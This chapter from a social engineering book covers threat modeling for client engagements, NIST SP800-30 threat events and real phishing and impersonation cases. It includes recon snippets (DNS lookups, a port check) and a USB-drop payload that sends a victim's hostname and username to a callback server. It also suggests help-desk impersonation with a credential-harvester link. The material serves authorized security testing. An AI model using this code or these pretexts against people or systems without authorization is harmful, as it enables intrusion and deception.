Chapter 6

Ensuring Value Through Effective Threat Modeling

Richard Ackroyd, Senior Security Engineer, RandomStorm Limited

Most customers realize that they need Social Engineering, but often set unrealistic targets. This chapter helps you to steer customers away from the Mission Impossible mentality and toward more practical objectives. Practical Social Engineering is less about dropping down nuclear cooling towers on ropes while avoiding lasers, and more about delivering value by identifying risks, even where time constraints tie one hand behind your back.

Keywords

Threat modeling; Information Assurance; Risk Management process; reconnaissance and surveillance; phishing; spear phishing; organized crime groups

Information in this chapter

• Why the need for threat modeling

• Gain access to my underground bunker data center

• Consultant led threat modeling

• Plugging into the Information Assurance and Risk Management processes

• Gather information using open-source discovery of organizational information

• Perform reconnaissance and surveillance of targeted organizations

• Craft phishing attacks

• Craft spear phishing attacks

• Create counterfeit/spoof web site

• Deliver malware by providing removable media

• Exploit physical access of authorized staff to gain access to organizational facilities

• Conduct outsider-based social engineering to obtain information

• Conduct insider-based social engineering to obtain information

• Obtain information by opportunistically stealing or scavenging information systems/components

• Who would want to gain access to my business?

• State-sponsored/terrorist groups

• Organized crime groups

• Trouble causers, hobbyists, and lone gunmen

• Other players

Introduction

Chapter 5 looked at how an actual social engineering engagement works, who is involved, and how to ensure a smooth delivery.

This chapter covers the process of ensuring that effective threat modeling is applied to the engagement, using examples of business critical assets as well as potential attack vectors for those assets. For example, why attempt to gain access to the highly secured data center, when the receptionist’s computer can get to the same data?

Additionally, it will take a look at the types of information that will be needed from the client in order to establish the key assets. This can include network diagrams, traffic flows, organizational hierarchies, host information, and more. All of this assumes that the test is not entirely black-box in nature, by which we mean that the engineer does not get access to any information in advance of the test.

Most professional services consultants will be more than familiar with the need to guide a client down the right path when it comes to services rendered. While the client may know that they need a service, they may not fully understand the subtleties of the profession to the extent required. It is for this reason that you will often see unrealistic requests in terms of target selection. As a social engineer, it is a big part of your job to ensure that realistic and relevant objectives are set and achieved through the use of threat modeling. Threat modeling is very much a consultative process that the engineer and client must explore if a project is going to be successful.

In some cases, the client will know exactly which systems and processes they will need to assess. This is often the case where the organization is already engaged in an Information Assurance (IA) process that includes Risk Management.

Furthermore, this chapter will take a look at the sort of people that may want to gain access to the data and related systems. It is not uncommon for people to think that a hacker on the Internet somewhere would be responsible for most of these breaches; however, it could just as easily be a competitor, a political activist, or a foreign government agent.

Some real-world examples of these breaches will bring the chapter to a close and help to identify how real-world attackers gain access to the data we are trying to protect.

Why the need for threat modeling?

On the face of it, this may appear to be a chapter that is surplus to requirements. People would be forgiven for thinking that an individual working in a modern organization would always be able to identify their key assets and build suitable defenses around them. Penetration testing and social engineering engagements over the years have taught me that this is rarely the case, sometimes to quite an eye-opening extent.

A recent example came during an internal assessment where the client had moved into a new facility and, as a result, everything was brand new. All the servers were running the very latest operating system and were fully patched. The same could be said of the desktop estate. What the client didn’t know was that an employee had plugged a rogue access point into the corporate network and configured it with WEP, no less. The point being made here is that if a business thinks it knows about everything that is going on in its organization and infrastructure, the chances are it doesn’t. The client in question had spent a lot of time and effort securing what they believed were the only entry points to their most critical assets. They had installed Firewalls and an Intrusion Prevention System (IPS) and used up-to-date software and best practices, but what they didn’t do was shut down unused switch ports, enable port security, or monitor for rogue access points. Although this may not be directly related to social engineering, it’s nigh on impossible to know all the entry points to an asset if the focus is purely on technology. A Firewall will never stop an authorized member of staff from leaking critical information over the phone, and neither will the former “Nuclear Bunker” that the Data Center is housed in. As a result, the reasons for needing threat modeling are clear. It’s very difficult to even identify the critical assets without taking a step back and looking at the bigger picture. Therefore, let’s talk through a common example of a client requirement, and why it isn’t always particularly realistic.
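As an aside on the rogue access point example, monitoring for unknown wireless networks is one of the easier detective controls to stand up. Below is a minimal sketch, assuming the scapy library and a wireless card already placed into monitor mode; the interface name and approved SSID list are illustrative, and flagging a beacon only tells you an unknown network is nearby, so confirming it is actually plugged into the corporate LAN still requires wired-side correlation.

from scapy.all import sniff, Dot11Beacon, Dot11Elt

APPROVED_SSIDS = {"CorpWiFi", "CorpGuest"}   # hypothetical approved networks
seen = set()

def check_beacon(pkt):
    # Only beacon frames periodically advertise a network's SSID
    if not pkt.haslayer(Dot11Beacon):
        return
    ssid = pkt[Dot11Elt].info.decode(errors="ignore")
    bssid = pkt.addr3
    if ssid and ssid not in APPROVED_SSIDS and bssid not in seen:
        seen.add(bssid)
        print(f"Possible rogue access point: SSID={ssid!r} BSSID={bssid}")

# Requires root privileges and a monitor-mode interface
sniff(iface="wlan0mon", prn=check_beacon, store=False)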

Gain access to my underground bunker data center

The first target that comes into most clients’ minds is the Data Center or Server Room. But how realistic a choice is this, and is it even feasible to get into a properly run Data Center without a team of Navy SEALs?

The main reason for this type of thinking is that most people will automatically think Crown Jewels and then their chain of thought leads them to where those assets are physically stored. This is kind of funny given the highly connected nature of the assets we are dealing with, and the entirely nonphysical nature of them to boot.

The asset needs to be defined to the client to enable them to move away from this thinking. The information is an asset, not just the physical server. The focus here is on protecting against the exfiltration of sensitive data, so let’s explore the attack vectors for that. While not wanting to get bogged down in talk of asset and risk classification just now, it does need to be briefly touched upon. The client needs to define what is important to them as a business, find out who and what has access to it, and assess the risks and vulnerabilities associated with the asset(s). It could be intellectual property, client data, or even credit card details.

Armed sentry guards could be posted at the Server Room doors, supported by all the physical security bells and whistles that can be mustered, but if a bank of desktop PCs with the required access to the data sits in an unguarded office, these measures are pointless.

How is realistic threat modeling achieved? There are two serious options: the first is to go through a consultative process with the client and help them to understand their own risks. The second is to plug into the IA process that the business may have already undertaken. This process will include a full asset enumeration, classification, and risk and vulnerability definition. The consultant-led, less formal approach will be covered first, before touching upon the IA process for risk analysis and management.

Consultant led threat modeling

At this point, the likely reaction will be—“I’m a social engineer not an IA consultant.” Luckily, this process does not need to become a fully fledged IA endeavor, far from it in fact. The vast majority of what is going to be done will actually be common sense.

When it comes to this process, the client is going to have to bring certain pieces of information so that an accurate assessment of the attack vectors can take place. A suitable approach can be to follow a “what, why, who, where, and how” approach when it comes to establishing where the risks lie. This approach is no doubt less formal than going down the IA route, but it is still a very valuable tool, both for you and your client.

What?

What is the asset? What is the key piece of information that needs to be protected? What regulatory guidelines does it fall under? It is likely that the vast majority of clients know what their key data is, but maybe they won’t know how a malicious social engineer would attempt to gain access to it. For example, the data may be intellectual property in the form of plans for a new product, which are stored in a database. The client may feel that an attacker would have to gain physical access to the network to recover the data, but the attacker may instead choose to manipulate somebody within the organization that has access to the asset. The information may also be stored in hard copy in a filing cabinet elsewhere within the business, and if so, is it sufficiently secured?

In terms of the type of information required to dive into this topic, you are largely going to be looking through network diagrams and asset lists for the vast majority of cases. There will be instances in which plans and confidential data will be kept on hard record, and this needs to be accounted for throughout this process. Part of this process may be for your client to know where all of the information is stored, including physical copies. This task on its own could take even a small business a very long time and should not be underestimated.

Why?

Why is the asset important? Why is it important that this information is protected against leakage? The impact may be purely financial due to fines levied by regulatory bodies. On the other hand, the data being leaked could be classified in nature and cause compromises in combat scenarios. Loss of reputation is also a common issue wherever a compromise occurs. Whatever the reason for the asset’s significance, it is worthwhile classifying each asset and assigning it a value that allows you to prioritize the work. The client may feel that a user leaking passwords is their biggest fear, but if client data is leaked, it could bring with it a hefty fine under the Data Protection Act 1998, as well as significant reputational damage. Just look at Sony’s £250,000 fine as an example. It’s not that passwords aren’t important, it’s just that we need to apply levels of importance to our assets. Everything in a business is there for a reason, but we can’t assign a criticality rating of 10 out of 10 to everything.
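To make the prioritization point concrete, a rough likelihood-times-impact score is often enough to rank assets during this conversation. The sketch below is illustrative only; the assets, the 1–5 scales, and the ratings are invented for the example and in practice would come from the client and their stakeholders.

# asset: (likelihood of compromise 1-5, business impact 1-5) -- illustrative values
assets = {
    "Customer database": (3, 5),
    "Staff passwords": (4, 3),
    "Product plans (hard copy)": (2, 4),
    "Public website content": (3, 1),
}

# Rank assets by a simple likelihood x impact score
scored = sorted(assets.items(), key=lambda item: item[1][0] * item[1][1], reverse=True)
for name, (likelihood, impact) in scored:
    print(f"{name:28} risk score: {likelihood * impact}")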

The key pieces of information required here are slightly more complicated. Involvement from stakeholders throughout the business will be required to adequately conduct the review. It is unrealistic to expect a handful of individuals to fully appreciate all risks within a business. Having people from different departments involved at this stage can leverage industry and role-specific knowledge that will be otherwise neglected.

Who?

Who has access to the asset? What departments do they work in? Can other users gain access to their systems and compromise the information? Once again the issues raised earlier return. What is the point in trying to hack through several layers of expensive security devices, when a well-targeted phishing e-mail can provide the access needed? The client already knows what the asset is, having been through the process of identifying it and its importance, but who can get to the asset? Who uses it? Why do they use it? How often and when do they use it? All of this information should start to build a picture, or flow of information that can be applied to better understand where the attack vectors are.

As with the “What?” section, there will typically be a process of analyzing the network diagrams and asset information, but also looking at staff lists and departmental information to establish role-based access.

Where?

Where is the data stored from both a physical and logical point of view? This will likely be identified to some extent in earlier sections where network and asset information is reviewed. Additionally, there is a need to have a full breakdown of where the systems are that can access the asset. Again, this is from a geographical point of view as well as from a logical one. When logical location is mentioned, this means its location on the network, which in most cases will be a designated VLAN or separate switch infrastructure. The physical location could be in a filing cabinet or in cab 421, Data Center 2; the point is, how can the risk to an asset be understood if its locations are unknown? This needs to be approached from all possible angles. Physical, logical, and human issues should all be addressed.

Once again, any asset register or low-level network diagram is likely to contain the information required from a technology point of view. Departmental heads should be able to advise upon the location of hard copies.

How?

How is the asset currently protected? How is it accessed? Again, there are differing answers dependent on the asset type. In some instances, the data may be accessed by a desktop application that connects to a back-end database over a VPN to the data center. It could be protected by a Firewall and an IPS.

Hard copies are more likely to be under lock and key. Another defense type more commonly overlooked is adequate staff training and authority. It is not uncommon to be able to extract sensitive data from users over the phone if they have not been adequately trained. Likewise, they are not likely to challenge unknown visitors if they have not been given the authority to do so.

In either case, an analysis of how the data is used and how it is currently defended will complete the picture for us before proceeding with the assessment.

A great deal of information about the assets has now been identified: what they are and which regulations they fall under. A clear picture of why the assets are important has also been formed.

It is fully understood who has access to the data and what their roles are within the business. It has been established where the data is stored and how it is accessed. All of this information can be used to accurately identify the real risks to the assets in question and build a list of vulnerabilities that will be fed into the social engineering engagement. These will form the basis of our assessment moving forward.

Instead of thinking “get into my Data Center,” the client now realizes that realistically all an attacker needs is to get into a filing cabinet on the second floor. The attack vector has changed massively and so has the client’s understanding of how to protect their assets. Of course, this is all easier said than done. Seeing all angles and attack vectors is a difficult task, and that’s why social engineering engagements are so useful. This process in and of itself is an awareness exercise that will be of real value to any client.

Now let’s hammer the point home by filling in the above categories with something more real world.

What?

The asset/critical information is client/customer data. The way this data is handled and any subsequent breaches fall under the jurisdiction of the Data Protection Act and the Information Commissioner’s Office.

Why?

The asset is important for a number of reasons. The financial implications of any breach are severe. Damage to reputation and loss of business are also serious consequences of any data loss.

Who?

Currently, Database Administrators, Application Developers, and Call Center staff all have access to the assets.

Where?

The data is stored both logically and physically. The client records are stored across two Data Centers in Databases, as well as hard copies in locked filing cabinets within secure rooms at the Call Center. The Call Center is within our Headquarters, which also hosts the vast majority of the staff.

How?

The Databases are protected with strong authentication, Firewalls and IPS. All records are encrypted within the database. The physical records are protected by lock and key. Any data is signed in and out by the duty manager as and when needed.

Access is gained by multiple methods. The Database Admins and Application Developers will typically access the Database Server directly via Remote Desktop Protocol and database management tools. The Call Center staff have access via an application so that they can see customer records as they take calls. This also allows them to amend or add records. The authentication for the Call Center application is handled by Active Directory, and ultimately the password is chosen by the staff themselves.
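It can help to capture the answers to the five questions in a simple, structured form so that they can be referred back to when designing scenarios. A minimal sketch follows; the field names and the way the example data is summarized are entirely illustrative.

from dataclasses import dataclass, field

@dataclass
class AssetThreatModel:
    what: str                 # the asset and any regulation it falls under
    why: str                  # impact if it is leaked or lost
    who: list = field(default_factory=list)    # roles with access
    where: list = field(default_factory=list)  # physical and logical locations
    how: list = field(default_factory=list)    # current protections and access paths

model = AssetThreatModel(
    what="Customer records (Data Protection Act / ICO)",
    why="Regulatory fines, reputational damage, loss of business",
    who=["Database Administrators", "Application Developers", "Call Center staff"],
    where=["Databases across two Data Centers", "Hard copies in locked cabinets at HQ"],
    how=["RDP and database tools", "Call Center application (Active Directory passwords)"],
)
print(model)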

Five questions in, and already several attack vectors open up. The Call Center staff could be a promising target, though they are more likely to have been trained to deal with inbound calls and will have scripts that are followed religiously.

Of course, if the choice is between a highly secured Data Center and a filing cabinet in an office, there isn’t much competition. There are far more plausible pretexts for being at the large HQ and far more potential targets within the business. There is also likely to be far less security and a lot more chance to blend in with the staff of the organization.

Additionally, take a good look at the Call Center staff and the application they use. It is extremely common for the direct access accounts for the Database—such as the SA account—to have very strong passwords, while the client application users are allowed to set their own. This in itself could well be the best angle available. Targeted or even broader e-mail phishing attacks could really bring back some frightening results, assuming each member of staff has Internet access. Alternatively, a call to those staff impersonating a help desk employee, along with a well-crafted e-mail containing a link to a credential harvester, could be the preferred angle.

E-mail phishing attacks will be covered in far more detail in Chapter 9.

Whatever the eventual tactic employed, at the end of this process the client will be far better off than they were before, and the increased understanding of the landscape will be enough to design some effective scenarios. Going into tests blind may sometimes be a prerequisite of a client, but it can be argued that an educated engagement can often produce far more relevant and lasting results.

Plugging into the Information Assurance and Risk Management processes

While the more informal model already discussed is a great way to engage a client, build rapport, and ensure success, there are more formally defined methods for performing threat modeling.

Hopefully by the time a client (who is moving through an IA project) gets in touch with the social engineer, they should already have a well-formed idea of what the risks and vulnerabilities are, as well as the value of social engineering. It is more than likely that they will be engaging with you to address the human element of information security.

Many social engineering engagements use a blended approach of technological as well as human exploits.

For many years there have been countless information security articles about how the insider, or the employee in this case, can be the single biggest risk to organizational security. The truth of the matter is that, malicious or not, people with any level of privilege within a business can pose a massive risk if not properly educated. It is important to note that any level of privilege refers to things like insider knowledge about how a business works, what applications it uses, and internal naming conventions or slang/code for systems. All of these seemingly uninteresting pieces of information can be devastating in the wrong hands, and they certainly won’t be treated with the same level of caution as a password, for example. A lot of social engineering jobs start with a tiny piece of information that can be built upon to gain credibility in further endeavors.

It is for these reasons that the human element of security finds its way into a great many standards within IA. Even the most comprehensive IA effort can still be further shaped by a good social engineer.

Don’t be reluctant to reshape a client’s expectations relating to their attack vectors, even when they believe they have all of their bases covered.

The Risk Management process allows organizations to make formal, informed decisions about what constitutes an acceptable risk with regard to Information Security, and to identify which parts of that process are applicable to the field of social engineering. There are numerous Risk Management frameworks available, including NIST SP800-30, which is freely available to download.

Consequently, for the purpose of this book, this has been chosen as the benchmark for Risk Management. A copy can be obtained from the following web site: http://csrc.nist.gov/publications/PubsSPs.html#800-30.

During the process of conducting the Risk Assessment, NIST SP800-30 introduces the concepts of Threat Sources and Threat Events.

The Threat Sources relevant to us are described by NIST as “Individuals, groups, organizations, or states that seek to exploit the organization’s dependence on cyber resources (i.e., information in electronic form, information and communications technologies, and the communications and information-handling capabilities provided by those technologies).” Some examples of real-world threat sources will be covered later in this chapter.

NIST defines several Threat Events that can be proactively tested during a social engineering engagement. These are as follows.

Gather information using open-source discovery of organizational information

Adversary mines publicly accessible information to gather information about organizational information systems, business processes, users or personnel, or external relationships that the adversary can subsequently employ in support of an attack.
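Open-source discovery spans everything from job adverts and social media to technical footprinting. As one small, programmatic slice of it, the sketch below pulls a target domain’s public DNS records, which frequently reveal mail providers, hosting arrangements, and third-party services. It assumes the third-party dnspython package, and the domain shown is a placeholder.

import dns.resolver  # third-party "dnspython" package

domain = "example.com"   # placeholder target
for record_type in ("MX", "NS", "TXT"):
    try:
        answers = dns.resolver.resolve(domain, record_type)
    except Exception as exc:
        print(f"{record_type}: lookup failed ({exc})")
        continue
    for rdata in answers:
        print(f"{record_type}: {rdata.to_text()}")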

Perform reconnaissance and surveillance of targeted organizations

Adversary uses various means (e.g., scanning, physical observation) over time to examine and assess organizations and ascertain points of vulnerability.

This kind of work is key to the reconnaissance stages of an engagement, which is covered in detail in Chapter 8.
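On the technical side of reconnaissance, even a crude check of which common services a host exposes can shape the later stages of an engagement. The following is a minimal sketch of a plain TCP connect check; the target address and port list are placeholders, and it should only ever be pointed at systems the client has authorized for testing.

import socket

target = "192.0.2.10"             # placeholder address (TEST-NET-1 range)
ports = [22, 80, 443, 445, 3389]  # a handful of commonly exposed services

for port in ports:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1.0)
        if s.connect_ex((target, port)) == 0:   # 0 means the connection succeeded
            print(f"{target}:{port} open")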

Craft phishing attacks

Adversary counterfeits communications from a legitimate/trustworthy source to acquire sensitive information such as usernames, passwords, or SSNs. Typical attacks occur via email, instant messaging, or comparable means; commonly directing users to websites that appear to be legitimate sites, while actually stealing the entered information.

Craft spear phishing attacks

Adversary employs phishing attacks targeted at high value targets (e.g., senior leaders/executives).

Phishing attacks are covered extensively in Chapter 9.

Create counterfeit/spoof web site

Adversary creates duplicates of legitimate websites; when users visit a counterfeit site, the site can gather information or download malware.

Some real-world examples of this kind of attack are covered later in the chapter.

Deliver malware by providing removable media

Adversary places removable media (e.g., flash drives) containing malware in locations external to organizational physical perimeters but where employees are likely to find the media (e.g., facilities parking lots, exhibits at conferences attended by employees) and use it on organizational information systems.

What happens if a nonemployee picks up the USB stick? Or if an employee plugs it into a noncorporate device? This opens up the potential for serious liability in these instances. A better proof of concept might be to have the malware just report that it has been clicked. Any monitoring or compromising of systems should be very carefully controlled.
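A minimal sketch of that safer proof of concept is shown below: when run, it sends a single beacon containing the hostname and username back to a server controlled by the assessment team, and does nothing else. The callback URL is hypothetical and would be agreed with the client in advance.

import getpass
import socket
import urllib.parse
import urllib.request

CALLBACK_URL = "https://assessment.example.org/beacon"  # hypothetical, client-approved server

# Report only the hostname and username of the machine the media was used on
params = urllib.parse.urlencode({
    "host": socket.gethostname(),
    "user": getpass.getuser(),
})
try:
    urllib.request.urlopen(f"{CALLBACK_URL}?{params}", timeout=5)
except Exception:
    pass  # fail silently; this is a proof of concept, not an implant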

Exploit physical access of authorized staff to gain access to organizational facilities

Adversary follows (“tailgates”) authorized individuals into secure/controlled locations with the goal of gaining access to facilities, circumventing physical security checks.

Tailgating may not be the most stealthy or skillful of attack vectors, but it can certainly be among the most effective when applied correctly. In high traffic areas, this tactic can pay off in a big way. Tailgating is covered in far more detail in Chapter 11.

Conduct outsider-based social engineering to obtain information

Externally placed adversary takes actions (e.g., using email, phone) with the intent of persuading or otherwise tricking individuals within organizations into revealing critical/sensitive information (e.g., personally identifiable information).

It is heartening to see social engineering directly referenced in standards. It is testament to not only the current threat landscape, but to the idea that technology is not all that defends our privacy.

The NIST SP800-30 standard actually refers to social engineering in several places, as well as the following:

Conduct insider-based social engineering to obtain information

Internally placed adversary takes actions (e.g., using email, phone) so that individuals within organizations reveal critical/sensitive information (e.g., mission information).

Often, the efficacy of an attack is improved when it is performed from within the organization’s boundaries. A call coming through on an internal number can make a vast difference when compared to one from an external source. Similarly, it would be easier to acquire information from an individual if the perpetrator is already within their secure office space. It is often perceived that if an individual is already located within the building, it must be a trusted individual. However, this is not always the case. Running privileged assessments of this nature can offer critical insight into overall security posture. Is the organization the classic hard outer shell with a gooey nougat center, or not?

Obtain information by opportunistically stealing or scavenging information systems/components

Adversary steals information systems or components (e.g., laptop computers or data storage media) that are left unattended outside of the physical perimeters of organizations, or scavenges discarded components.

Dumpster Diving is another core tool of any social engineering team. Recovery of USB sticks or Hard Disks can be as good as it gets. What most people think of as securely erased generally is far from it. With the prevalence of outsourced data destruction, it can be all too easy to just throw away that USB stick without a care in the world. How quickly can the data destruction guys get to it, before anybody malicious does?
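For context on why “deleted” rarely means gone, genuinely erasing a file on a traditional magnetic disk means overwriting its contents before unlinking it, as in the minimal sketch below (the file path is a placeholder). Even then, on SSDs and on journaling or copy-on-write filesystems an overwrite is no guarantee, which is why full-disk encryption or physical destruction remains the safer policy.

import os

def overwrite_and_delete(path, passes=1):
    # Overwrite the file's contents with random data before unlinking it
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))
            f.flush()
            os.fsync(f.fileno())
    os.remove(path)

overwrite_and_delete("sensitive_export.csv")   # hypothetical file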

As mentioned earlier, some standards do provide coverage on social engineering techniques quite extensively. There are in fact other Threat Events within NIST SP800-30 that could fall within the remit of a social engineering engagement. This is especially the case where the social engineering engagement is a blended attack. These kinds of attack cover both the traditional social engineering aspects and the objectives that would usually fall under the Penetration Testing guise.

This section has been designed to provide the reader with a greater insight into Threat Modeling, both from a formal and informal perspective. Let’s move on and take a look at Threat Actors.

NIST SP800-30—Official contribution of the National Institute of Standards and Technology; not subject to copyright in the United States.

Who would want to gain access to my business?

Threat modeling cannot be introduced without providing a greater understanding of the threat actors within this space. This may well help in understanding the source of potential attacks against your business.

A lot of what is seen in the “traditional” cyber-crime world most definitely fits social engineering as well. Throughout this book there has been frequent mention of how there is often a technological aspect to social engineering, especially where large-scale breaches are concerned.

The FBI published an article which identified what they believe to be the three primary actors when it comes to cyber-crime. Here is an excerpt from that article:

Q: Where are the cyber threats coming from today?

Mr. Henry: We see three primary actors: organized crime groups that are primarily threatening the financial services sector, and they are expanding the scope of their attacks; state sponsors—foreign governments that are interested in pilfering data, including intellectual property and research and development data from major manufacturers, government agencies, and defence contractors; and increasingly terrorist groups who want to impact this country the same way they did on 9/11 by flying planes into buildings. They are seeking to use the network to challenge the United States by looking at critical infrastructure to disrupt or harm the viability of our way of life.

http://www.fbi.gov/news/stories/2012/march/shawn-henry_032712/shawn-henry_032712

The main threats, as far as the FBI see it, are organized crime groups, state-sponsored organizations, and last of all, terrorist groups.

State-sponsored/terrorist groups

There are very recent examples which validate the FBI’s opinion on this matter. For example, the “Syrian Electronic Army” (SEA) appears to be quite prolific at the moment, gaining access to the Twitter accounts of the BBC Weather service and of various agencies, including Reuters, The Onion, and the Financial Times. At the time of writing, it is too soon to fully understand how the @thomsonreuters Twitter account was compromised, but The Onion and Financial Times hacks by the same perpetrators have been confirmed as phishing attacks.

Check Chapter 9 to see how easy it is to perform phishing attacks for security-auditing purposes.

Yes, people are still clicking links in e-mails with reckless abandon. The Financial Times example was a very simple e-mail with a link, which looked like it would hit a Cable News Network article. Once the link was clicked, it actually went to a compromised WordPress site. The WordPress site redirected to a forged Financial Times Webmail page. It was at this point that credentials were harvested as the user entered them.

The SEA certainly fit the FBI’s notion of primary threat actors. The SEA are thought to be political activists supporting Syrian President Bashar al-Assad. What would the SEA gain from such breaches? In most cases, the motive has been to post propaganda on western media sites and accounts; this was certainly the case in the BBC Weather Twitter hack.

In the case of a recently compromised Associated Press Twitter account, the SEA were able to send the stock market into panic and briefly wipe an estimated $136 billion off US stock market value. They achieved this by claiming that explosions within the White House had injured the President. Not only did they use social engineering to gain access to the account, but they then used impersonation to achieve their objective too. It’s interesting just how often basic impersonation is used in social engineering engagements. A phone call posing as another individual, or an e-mail from a domain that looks a lot like the target’s, can often provide just enough leverage.
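Those look-alike domains are cheap to register and easy to overlook. As a quick defensive check, the deliberately naive sketch below generates a few obvious character-swap variants of a domain and reports whether they currently resolve; the target domain is a placeholder, and real monitoring would use a far richer set of permutations.

import socket

def lookalike_variants(domain):
    # Generate a deliberately naive set of character-swap variants
    name, _, tld = domain.partition(".")
    swaps = {"o": "0", "i": "1", "l": "1", "e": "3"}
    variants = {name.replace(a, b, 1) + "." + tld for a, b in swaps.items() if a in name}
    variants.add(name + "-secure." + tld)
    return variants - {domain}

for candidate in sorted(lookalike_variants("example.com")):   # placeholder domain
    try:
        print(f"{candidate} resolves to {socket.gethostbyname(candidate)}")
    except socket.gaierror:
        print(f"{candidate} does not currently resolve")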

Organized crime groups

Again, there are plenty of cases out there that indicate the use of social engineering techniques. The vast majority implement broad-scale phishing attacks. This is very likely down to the simplicity, low maintenance, and large target audience of such scams. A very recent case (June 19, 2013) was uncovered by the Met Police Central e-Crime Unit, the Serious Organised Crime Agency, and the US Secret Service. The general idea behind the phishing scam was to gain access to the bank accounts of its victims. The group hosted in excess of 2500 fake web sites that were clones of legitimate banking sites. It was estimated that £59m of fraud was prevented in the United Kingdom alone. Possibly the most interesting aspect of this entire scam was its scale. The attacks were successful against people from across the globe, not just from the United States and United Kingdom as you may be forgiven for thinking.

Trouble causers, hobbyists, and lone gunmen

While the FBI has covered all the major bases, there are always going to be outliers. Just because a social engineer or hacker is not state sponsored does not mean that they should be taken any less seriously. On the contrary, it is often the hobbyist, trouble causer, or prankster that causes us the biggest problems.

One of the most famous cases of recent times was that of the Australian radio pranksters from 2Day FM. The prank was simple: call the hospital that the Duchess of Cambridge had been admitted to, pretend to be Queen Elizabeth II, and see where it leads. The truth of the matter is that the DJs were not expecting to be put through to anybody, let alone be given actual information. Where the call led couldn’t have been predicted by anybody. First of all, the level of information given could be deemed interesting to say the least. It included visiting times, the movements of Prince William, and the general condition of the Duchess. In an industry where patient confidentiality is so highly guarded, it is surprising that this sort of thing can happen. Sadly, this is not where the story ends. Following the media uproar, the nurse who disclosed the information committed suicide. She had left a note blaming the radio DJs for her death. While this is an extreme and saddening case, there are things that we can learn as social engineers. First of all, how much formal training had the nurses been given regarding the handling of phone calls? It is hoped that they had not only been trained, but made aware of social engineering as a whole. If it wasn’t radio pranksters making the call, it could have been journalists trying to get a scoop.

Another point worth making is that if the right person is phoned, the right act is given and the right questions asked, it is very likely that answers will be obtained. Even in extreme and sometimes silly circumstances. This is a case of building a pretext and using it to gain unauthorized access.

We covered pretexts in more detail in Chapter 3.

A final point is one of an ethical nature. It is very difficult for a social engineer to keep themselves in check and still be able to live the pretext. It can be easy to be swept away into doing something you may regret. Don’t forget that the person on the other end of that phone does not want to be a victim of your deception. This is where not naming names comes into the picture again. We are not in this business to single out individuals and embarrass or shame them. As with the nurse in this story, the consequences can be truly horrible. Always bear this in mind when engaging with a client. Emphasize the point of company-wide education, not individual naming and punishment.

Thinking about the amount of damage caused by a single prank call really puts things in perspective. It is almost certain that the hospital in question will have introduced all kinds of formal training to try and address the shortcomings they fell victim to. The damage to their reputation was obviously tangible. There are usually financial implications for the unauthorized leakage of patient records too. Sadly, there was far more than reputation and money at stake in this instance.

Other players

There are plenty of other individuals who would seek to gain information from people or businesses without your consent. It is most likely that these people are employed to do this for “an honest living.” Salespeople are a classic example of social engineers. A salesperson will not hesitate to be creative with the truth to win business. Largely, these will be smaller mistruths that allow them to get on the phone with their target. They can be as simple as “Can you pass me through to Andrew Mason, he is expecting my call?” or “Hi, I was just speaking with Gavin Watson and was cut off, could you pass me back through please? It is an urgent matter.” The impact of allowing sales calls through to staff is probably no more than a nuisance, but the lack of process that allows this to happen is worthy of serious review.

Are there any other risks that do not fall into our already defined categories? What about competitors?

If a salesperson can get through to the right people, what is there to stop your rivals from exploiting the same flaws? Competitive intelligence may be deemed legal, but industrial and economic espionage are not. This has not halted their existence, however. Telekom Malaysia Bhd had to investigate an alleged case of industrial espionage recently, after receiving complaints that an employee of one of its partners had gained access to a rival’s facility by posing as a member of Telekom Malaysia’s entourage. Tailgating is one thing, but being recognized as a member of a larger, authorized group? Defending against these kinds of issues can be difficult at the best of times. Diligence when dealing with large groups of visitors is the key here; do not bypass any policies on visitors just because it’s too difficult to deal with large volumes of them. Shortcutting the usual procedures will always lead to problems.

This section of the chapter covered the various threat actors that could potentially use social engineering against you. There are no doubt more, and in many cases it will be specific to each particular industry. Who is most likely to target you and why?

Summary

This chapter covered threat modeling and what it means in the real world. First of all, the need for threat modeling was touched upon.

Getting a client to think outside of the box was the first driver for threat modeling: why an attacker may think differently, and how they may take an entirely unexpected route to the critical data. This was to drive home the “get into my Data Center” point. Getting into the Data Center is often not the easiest way to exfiltrate data. Why go in the front door, when a side door grants the same level of access with far fewer complications?

Next the chapter covered how to apply practical knowledge to build a threat model. In this section, we covered how to lead a client through the process of accurately identifying attack vectors. This was a practical approach that most people would be comfortable working through, and that could be a basis for your own model.

Next came an example of how this would look in the real world. The last point was to identify which pieces of information were useful to us as social engineers.

Having covered the informal process, we took a more in-depth look at a formal approach to risk management, in the form of NIST’s SP800-30 standard. This standard is one of many that an organization could choose to assess and mitigate against information leakage.

The great thing about this standard is that it is publicly available for you to download today, at no cost. On top of this, it actually directly references social engineering as a threat event. There were several threat events identified within the standard that fit perfectly into social engineering engagements. This covered dumpster diving, tailgating, and phishing attacks among others.

We then moved on to the topic of Threat Actors. These are the guys trying to get into your organization to steal your data or damage your reputation. Some great real-world examples were covered next, most of them very recent, including a look at state-sponsored groups in the form of the SEA’s phishing attacks against BBC Weather, the Financial Times, and The Onion.

Next came a brief look at organized crime groups and a real-world example involving over 2500 fake web sites designed to harvest online banking credentials for nefarious purposes. In that particular case, the potential financial implications ran into the tens of millions.

We then took a look at the unfortunate case of the 2Day FM radio prank, which had serious and far-reaching consequences. This reminded us to always be aware of the ethical implications of your actions, and not to let the pretext own your actions.

Onward to Chapter 7, where the process of building a scenario from the ground up will be covered.
